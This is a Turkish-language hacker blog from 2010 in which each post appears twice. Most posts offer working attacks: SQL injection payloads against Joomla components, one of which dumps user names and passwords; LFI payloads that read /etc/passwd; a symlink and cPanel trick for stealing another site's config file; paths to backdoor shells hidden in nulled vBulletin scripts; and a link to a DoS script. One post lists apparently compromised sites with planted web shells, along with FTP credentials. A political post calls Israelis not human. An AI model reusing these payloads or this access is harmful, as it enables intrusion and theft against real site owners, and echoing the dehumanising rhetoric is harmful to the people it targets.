31 Mayıs 2010 Pazartesi

BOYCOTT İSRAEL

israel'in  FİLİSTİNLİ kardeşlerimize ve FİLİSTİNLİ kardeşlerimize giden insani yardım konvoyuna saldırmasını siddetle kınıyorum.. Yaptıkları şey sadece soykırım hatta soykırım ötesidir.. Yaptıkları insanlık dışıdır.. onlar insan olamazlar..  SONUNA KADAR FİLİSTİNLİ kardeşlerimizin yanında olacagız KAHROLSUN İSRAEL..

BOYCOTT İSRAEL

israel'in  FİLİSTİNLİ kardeşlerimize ve FİLİSTİNLİ kardeşlerimize giden insani yardım konvoyuna saldırmasını siddetle kınıyorum.. Yaptıkları şey sadece soykırım hatta soykırım ötesidir.. Yaptıkları insanlık dışıdır.. onlar insan olamazlar..  SONUNA KADAR FİLİSTİNLİ kardeşlerimizin yanında olacagız KAHROLSUN İSRAEL..

29 Mayıs 2010 Cumartesi

Vbulletin Null Scriptlerdeki Gizli Shell Yolları

Vbulletin 3.7.3  Attackerz Crew Ekibi Bulmuştu Bu Shelli ..
site.com/includes/class_dm_announcement.php?p=1

Vbulletin 3.8.x  Birisini Site Paso Vbulletin Kurulu Siteleri Hacklerken gördüm Biraz Araştırınca Vbulletin Null Scripte Atılmış Gizli Shell OLdugu Ortaya Çıktı
site.com/archive/modules.php 

Vbulletin 3.8.x  Null Scripte Bulunmaktadır Bu Sheller  Bir Başkası Tarafından Gizlenip Kendi  Araştırmam Sonucu Buldugum Shelldir.
site.com/vbpoll.php

Bu shelleri Scriptlere 2 Yerden Upload Edildigini Saptadık..

http://www.vbulletinci.com/
http://vbarsiv.com/

Bu iki sitedeki Scriptlerde ve Free Wordpress Bloglarında Yayınlanan  Null vb scriptlerde shell bulunmaktadır..

Vbulletin Null Scriptlerdeki Gizli Shell Yolları

Vbulletin 3.7.3  Attackerz Crew Ekibi Bulmuştu Bu Shelli ..
site.com/includes/class_dm_announcement.php?p=1

Vbulletin 3.8.x  Birisini Site Paso Vbulletin Kurulu Siteleri Hacklerken gördüm Biraz Araştırınca Vbulletin Null Scripte Atılmış Gizli Shell OLdugu Ortaya Çıktı
site.com/archive/modules.php 

Vbulletin 3.8.x  Null Scripte Bulunmaktadır Bu Sheller  Bir Başkası Tarafından Gizlenip Kendi  Araştırmam Sonucu Buldugum Shelldir.
site.com/vbpoll.php

Bu shelleri Scriptlere 2 Yerden Upload Edildigini Saptadık..

http://www.vbulletinci.com/
http://vbarsiv.com/

Bu iki sitedeki Scriptlerde ve Free Wordpress Bloglarında Yayınlanan  Null vb scriptlerde shell bulunmaktadır..

25 Mayıs 2010 Salı

Php Ping Saldırı Scripti Yayında..

Php ping botnet saldırı scriptidir  bu scriptin çalışması için bu dosyanın atıldıgı sunucuda safe mode off ve system fonksionu kapalı olmamalıdır.. yoksa script hata verir ve saldırı gerçekleştiremezsiniz..  url alttadır..

http://www.forum53.net/vb/otoping.php

hedef ip adres olarak çıkan ip adres sizin ip adresinizdir söyleyimde ben kendinize saldırmayın :)  netten düşebilirsiniz :)

Modemi yakabülüsünüz cebünüze zarar verebülüsünüz..

Alıntı yapacaksan kaynak göster yok göstermessen önündeki bilgisayar masa + monitor + kasa olarak G*T*ne girsin..!

Php Ping Saldırı Scripti Yayında..

Php ping botnet saldırı scriptidir  bu scriptin çalışması için bu dosyanın atıldıgı sunucuda safe mode off ve system fonksionu kapalı olmamalıdır.. yoksa script hata verir ve saldırı gerçekleştiremezsiniz..  url alttadır..

http://www.forum53.net/vb/otoping.php

hedef ip adres olarak çıkan ip adres sizin ip adresinizdir söyleyimde ben kendinize saldırmayın :)  netten düşebilirsiniz :)

Modemi yakabülüsünüz cebünüze zarar verebülüsünüz..

Alıntı yapacaksan kaynak göster yok göstermessen önündeki bilgisayar masa + monitor + kasa olarak G*T*ne girsin..!

23 Mayıs 2010 Pazar

cpanel forbidden 403 bypass

 Bu forbidden 403  olayı canımı çok sıkar oldu her yerde karşıma çıkıyordu artık bu sorunuda aşmış oldum..

İlk olarak hedef sitemizin sunucusundaki bir sitenin cpanel bilgilerinin elimizde olması gerekiyor.

symlink ile benim çektigim dosya adı atıyorum  ln -s /home/hedefsite/public_html/config.php symlink.txt
site.com/symlink.txt olarak okumak istedigimde 403 forbidden diyor hemen cpanele girip

http://site.com:2082/download?file=/public_html/symlink.txt  symlink ile çektigimiz  dosyamızı download ediyoruz ve config bilgilerini alıp hedef sitemize çakıyoruz..

Tamamen kendime aittir alıntı yaparken kaynak göstermiyenin GÖTÜNE  elindeki Mause girsin :)

cpanel forbidden 403 bypass

 Bu forbidden 403  olayı canımı çok sıkar oldu her yerde karşıma çıkıyordu artık bu sorunuda aşmış oldum..

İlk olarak hedef sitemizin sunucusundaki bir sitenin cpanel bilgilerinin elimizde olması gerekiyor.

symlink ile benim çektigim dosya adı atıyorum  ln -s /home/hedefsite/public_html/config.php symlink.txt
site.com/symlink.txt olarak okumak istedigimde 403 forbidden diyor hemen cpanele girip

http://site.com:2082/download?file=/public_html/symlink.txt  symlink ile çektigimiz  dosyamızı download ediyoruz ve config bilgilerini alıp hedef sitemize çakıyoruz..

Tamamen kendime aittir alıntı yaparken kaynak göstermiyenin GÖTÜNE  elindeki Mause girsin :)

Webloader v8 SQL Injection Vulnerability

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

Webloader v8 SQL Injection Vulnerability

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

16 Mayıs 2010 Pazar

Joomla Component com_job LFI Vulnerability

[!] Title: Joomla Component com_job LFI Vulnerability

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_job&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_job&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_job LFI Vulnerability

[!] Title: Joomla Component com_job LFI Vulnerability

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_job&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_job&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_crowdsource SQL Injection

[!] Title: Joomla Component com_crowdsource   SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_crowdsource SQL Injection

[!] Title: Joomla Component com_crowdsource   SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_resource SQL Injection

 BİZE SOSYAL MUHENDİSLİKTEN  BASKA BİR BOK BİLMİYORSUNUZ  DİYENLERE KAPAK OLSUN

[!] Title: Joomla Component com_resource SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]##########################################[+]


[!]  Google Dork : inurl:com_resource

[!]  ExploiT     :

-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--


[+]##########################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_resource SQL Injection

 BİZE SOSYAL MUHENDİSLİKTEN  BASKA BİR BOK BİLMİYORSUNUZ  DİYENLERE KAPAK OLSUN

[!] Title: Joomla Component com_resource SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]##########################################[+]


[!]  Google Dork : inurl:com_resource

[!]  ExploiT     :

-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--


[+]##########################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_comp ( cid ) SQL Injection

[!] Title: Joomla Component com_comp ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_comp&task=view&cid=-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_comp ( cid ) SQL Injection

[!] Title: Joomla Component com_comp ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_comp&task=view&cid=-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product ( catid ) SQL Injection

[!] Title: Joomla Component com_product ( catid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_product&catid=-24/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_doqment ( cid ) SQL Injection

[!] Title: Joomla Component com_doqment ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELeCt/**/1,2,3,4,5,6,7,8/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_doqment&cid=-15/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_doqment ( cid ) SQL Injection

[!] Title: Joomla Component com_doqment ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELeCt/**/1,2,3,4,5,6,7,8/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_doqment&cid=-15/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product ( catid ) SQL Injection

[!] Title: Joomla Component com_product ( catid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_product&catid=-24/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_classifieds ( subcategory ) SQL Injection

[!] Title: Joomla Component com_classifieds ( subcategory )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_classifieds ( subcategory ) SQL Injection

[!] Title: Joomla Component com_classifieds ( subcategory )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product LFI Vulnerability

[!] Title: Joomla Component com_product LFI Vulnerability

[!] Date: 16.05.2010
  
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_product&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product LFI Vulnerability

[!] Title: Joomla Component com_product LFI Vulnerability

[!] Date: 16.05.2010
  
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_product&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product LFI Vulnerability

[!] Title: Joomla Component com_product LFI Vulnerability

[!] Date: 16.05.2010
  
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_product&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

15 Mayıs 2010 Cumartesi

Shell sokulmuş hazır serverler 1

 ftp url : edelim.com
 ftp user : edelimco
ftp pass : 654321


http://iviveh2o.com/ivive/templates/beez/index.php
http://teamfuzeta.com/tmp/ege.php
http://www.wavery-productions.com/tmp/ege.php
http://www.sevaset.org/sevaset/tmp/ege.php
http://www.hotelmaresol.com/hm/tmp/ege.php4
http://www.pa-tanggamus.go.id/ege.php

Shell sokulmuş hazır serverler 1

 ftp url : edelim.com
 ftp user : edelimco
ftp pass : 654321


http://iviveh2o.com/ivive/templates/beez/index.php
http://teamfuzeta.com/tmp/ege.php
http://www.wavery-productions.com/tmp/ege.php
http://www.sevaset.org/sevaset/tmp/ege.php
http://www.hotelmaresol.com/hm/tmp/ege.php4
http://www.pa-tanggamus.go.id/ege.php